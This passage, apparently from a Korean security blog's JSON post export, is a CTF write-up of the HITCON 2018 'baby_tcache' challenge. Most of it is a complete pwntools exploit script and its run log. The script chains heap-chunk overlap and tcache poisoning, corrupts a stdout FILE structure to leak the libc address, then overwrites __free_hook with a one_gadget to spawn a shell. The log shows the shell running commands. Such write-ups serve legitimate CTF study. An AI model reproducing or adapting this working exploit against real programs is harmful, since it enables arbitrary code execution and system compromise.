                    new_heap(0x100, p64(0x4142434445464748)) #3\n    new_heap(0x100, p64(what)) \n\n    delete_heap(3)\n\n    pi()\n    break<\/pre>\n\n\n\n
                solve.py<\/h3>\n\n\n\n
                #!\/usr\/bin\/env python3\nimport sys, io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8', errors='replace')\nsys.stderr = io.TextIOWrapper(sys.stderr.buffer, encoding='utf-8', errors='replace')\n\nfrom pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\n\nwhile True:\n    p = process(\".\/baby_tcache\")\n    # p = remote(\"challenge.nahamcon.com\", 31899)\n    e = ELF('.\/baby_tcache',checksec=False)\n    l = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n    # l = ELF('.\/libc.so.6', checksec=False)    \n\n    s = lambda str: p.send(str)\n    sl = lambda str: p.sendline(str)\n    sa = lambda delims, str: p.sendafter(delims, str)\n    sla = lambda delims, str: p.sendlineafter(delims, str)\n    r = lambda numb=4096: p.recv(numb)\n    rl = lambda: p.recvline()\n    ru = lambda delims: p.recvuntil(delims)\n    uu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\n    uu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\n    li = lambda str, data: log.success(str + \"========>\" + hex(data))\n    ip = lambda: input()\n    pi = lambda: p.interactive()    \n\n    def new_heap(size, data):\n        sla(\"Your choice: \", \"1\")\n        sla(\"Size:\", str(size))\n        sa(b\"Data:\", data)\n\n    def delete_heap(idx):\n        sl(\"2\")\n        sla(\"Index:\", str(idx))\n\n    new_heap(0x410, b\"A\"*8)    #0\n    new_heap(0x60, b\"B\"*8)     #1\n    new_heap(0x60, b\"C\"*8)     #2\n    new_heap(0x4f0, b\"D\"*8)    #3\n    new_heap(0xf0, b\"E\"*8)     #4\n\n    delete_heap(2)\n\n    # ip()\n    new_heap(0x68, b'a'*0x60 + p64(0x500)) #2\n    # ip()\n\n    delete_heap(0)\n    delete_heap(3)\n    delete_heap(1)\n\n    #?\n    # ip()\n    new_heap(0x410, b'b'*8) #0\n    # ip()\n    new_heap(0x100, p16(0xe760)) #1\n    # ip()\n    new_heap(0x60, b\"\\x60\") #3\n    # ip()\n    \n    pay = p64(0xfbad1800)\n    pay += p64(0)*3\n    pay += p8(0)\n\n    # ip()\n\n    try:\n        new_heap(0x60, pay)\n        # pause()\n    except:\n        p.close()\n        continue\n    \n    leak = r()\n    leak = leak[0xc8:0xc8+8]\n    leak = uu64(leak)\n    info(f\"leak: {hex(leak)}\")\n    l.address = leak - l.sym._IO_2_1_stdin_\n    success(f\"libc base: {hex(l.address)}\")\n\n    delete_heap(3)\n    delete_heap(1)\n    # ip()\n\n    where = l.sym.__free_hook\n    what = l.address + 0x4f302\n    new_heap(0x100, p64(where)) #1\n    new_heap(0x100, p64(0x4142434445464748)) #3\n    new_heap(0x100, p64(what)) \n\n    delete_heap(3)\n\n    pi()\n    break<\/pre>\n\n\n\n
                Result<\/h3>\n\n\n\n
                ubuntu@230e8fc3a277:~\/study\/baby_tcache$ python3 solve2.py\n[+] Starting local process '.\/baby_tcache': pid 14428\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[*] Process '.\/baby_tcache' stopped with exit code -11 (SIGSEGV) (pid 14428)\n[+] Starting local process '.\/baby_tcache': pid 14432\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[*] Process '.\/baby_tcache' stopped with exit code -11 (SIGSEGV) (pid 14432)\n[+] Starting local process '.\/baby_tcache': pid 14434\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[*] Process '.\/baby_tcache' stopped with exit code -11 (SIGSEGV) (pid 14434)\n[+] Starting local process '.\/baby_tcache': pid 14436\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[*] Process '.\/baby_tcache' stopped with exit code -11 (SIGSEGV) (pid 14436)\n[+] Starting local process '.\/baby_tcache': pid 14438\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[*] leak: 0x7f21c99ada00\n[+] libc base: 0x7f21c95c2000\n[*] Switching to interactive mode\n$ ls\nbaby_tcache  libc.so.6                     solve.py   solve3.py\nd            peda-session-baby_tcache.txt  solve2.py\n$ uname -a\nLinux 230e8fc3a277 5.15.167.4-microsoft-standard-WSL2 #1 SMP Tue Nov 5 00:21:55 UTC 2024 x86_64 x86_64 x86_64 GNU\/Linux\n$ id\nuid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)\n$ \n[*] Interrupted\n[*] Stopped process '.\/baby_tcache' (pid 14438)<\/pre>\n","protected":false},"excerpt":{"rendered":"
                Source https:\/\/github.com\/integeruser\/on-pwning\/tree\/master\/2018-hitcon\/Baby-Tcache checksec Decompiled-src \/ Analysis main \uc804\uc5d0 \ubd24\ub358 childheap \ubb38\uc81c\uc640 \uac19\uc774 2\uac00\uc9c0 \uba54\ub274\ub9cc \uc874\uc7ac\ud558\uace0 print_heap \uac19\uc740 \ud799 \ub0b4\uc6a9 \ucd9c\ub825\uc744 \ud560 \uc218 \uc5c6\ub2e4. 1. new_heap idx\ub294 0~9, malloc size\ub294 0x2000\uc774\ud558 \uc870\uac74\ud558\uc5d0\ud560\ub2f9\ub41c \uc2ac\ub86f\uc5d0\ub2e4\uac00 \ub370\uc774\ud130\ub97c \uc800\uc7a5\ud560 \uc218 \uc788\ub2e4. 2. delete_heap idx\ub97c \uc785\ub825\ud558\uba74, \ud560\ub2f9\ub41c heap \ub0b4\uc6a9\uc5d0 \uc804\ubd80\ub2e4 0xDA\ub85c memset\uc2dc\ud0a8\ub2e4. \uadf8\ub7f0\ub2e4\uc74c free\uc2dc\ud0a4\uace0, \uc804\uc5ed\uc8fc\uc18c\uc5d0 \uc788\ub358 \uc800\uc7a5\ub41c \ud560\ub2f9\uc8fc\uc18c\uc640 \ud560\ub2f9\ud06c\uae30\ub97c 0\uc73c\ub85c \ucd08\uae30\ud654\ud55c\ub2e4.… \ub354 \ubcf4\uae30 »[HITCON CTF 2018] baby_tcache (\ud799\ub0b4\uc6a9 \ucd9c\ub825\uc5c6\ub294 malloc\/free \uae30\ub2a5\ub9cc \uc788\ub294 \ucf00\uc774\uc2a42)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[56,35,25,66,74],"class_list":["post-3762","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-glibc_2-27","tag-heap","tag-pwnable","tag-tcache","tag-tcache_dup"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3762","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3762"}],"version-history":[{"count":3,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3762\/revisions"}],"predecessor-version":[{"id":3781,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3762\/revisions\/3781"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3762"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3762"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3762"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}